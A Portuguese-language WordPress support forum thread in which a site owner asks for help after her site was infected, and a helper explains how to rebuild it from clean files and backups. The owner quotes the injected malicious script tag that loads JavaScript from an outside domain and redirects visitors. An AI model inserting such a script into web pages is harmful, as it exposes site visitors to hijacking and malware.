Suporte » Outros assuntos » Vírus no site

Visualizando 4 respostas - 1 até 4 (de um total de 4)
  • Letícia você possui backup do site?

    Caso não tenha backup:
    Faça um backup, mesmo desse momento em que os arquivos estejam prejudicados é necessário para que possa recuperar os arquivos (realmente) necessários do seu site.

    Em uma situação muito semelhante o que precisei fazer foi:

    1. Descobrir a versão do WordPress
    2. Listar os plugins e o tema utilizados no site
    3. Copiar em um local seguro a pasta /uploads
    4. Fazer backup do seu banco de dados (pelo PHPMyAdmin)

    Com isso em mãos, será necessário verificar se esses arquivos acima apontados estão prejudicados pela invasão. Para isso será necessário um mínimo conhecimento sobre os mesmos, para poder identificar qualquer parte que não faça parte dos mesmos. Caso algum arquivo esteja fora do habitual, será necessário fazer a correção, em todos, inclusive a mesma ação será necessária para o banco de dados.

    E então, com os arquivos limpos e certificados de que estão de acordo com suas funções reais, vamos ‘reconstruir’ site.

    1. Baixar o arquivo na versão do mesmo que estava usando
    2. Adicionar na pasta /wp-content a sua pasta /uploads
    3. Adicionar os plugins e tema nas respectivas pastas
    4. Criar um novo banco de dados e adicionar o backup do mesmo
    5. Configurar o arquivo /wp-config com as novas credenciais do banco de dados

    Tudo estando certo nesses procedimentos, seu site estará corrigido. Porém é importante seguir o máximo de metodologias para manter a segurança do seu site, como manter o WordPress, temas e plugins sempre atualizados, hospedar o site em uma hospedagem segura, não usar plugins ou trechos de códigos ‘piratas’ ou sem o conhecimento de seu funcionamento, etc.

    Caso tenha backup:

    Ótimo, aqui será muito mais simples, apague todos arquivos de sua hospedagem (desde que saiba quais são os arquivos que possui no backup) e restaure o backup que possui.

    Importante: As possibilidades de invasão de um site são inúmeras, por isso a necessidade de tomar todas as precauções possíveis. Inclusive se a invasão foi feita através de uma senha fraca, isso seria quase impossível de evitar (a menos que todas as senhas utilizadas sejam realmente fortes).

    Letícia, veja se essas informações lhe ajudam e nos retorne aqui.

    Oi Everaldo, boa noite!

    Ai meu amigo, eu fiz tudo isso e não deu certo, a situação está piorando cada vez mais, vi que em todos os arquivos foi incluído o scriot

    <script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script&gt;

    que no caso é o vírus e para onde o site é redirecionado ao tentar entrar

    agora eu só estou com o acesso ao cpanel, não consigo mais entrar no login e senha nem acessar a página do wordpress, existe alguma possibilidade de solucionar este problema?

    estou desesperada

    Subi o backup porém agora ele aparece o erro HTTP ERROR 500, não sei mais o que fazer, entrei em todos os arquivos com o nome de index e retirei o script com o vírus porém quando eu subi os arquivos para substituir ele aparece esse erro e eu continuo sem acesso a página do wordpress.

    Esse erro pode ser um problema com o arquivo .htaccess, você pode fazer um backup do .htaccess e criar um novo com o seguinte conteúdo:
    `# BEGIN WordPress
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress

Visualizando 4 respostas - 1 até 4 (de um total de 4)
  • Você deve estar conectado para responder a este tópico.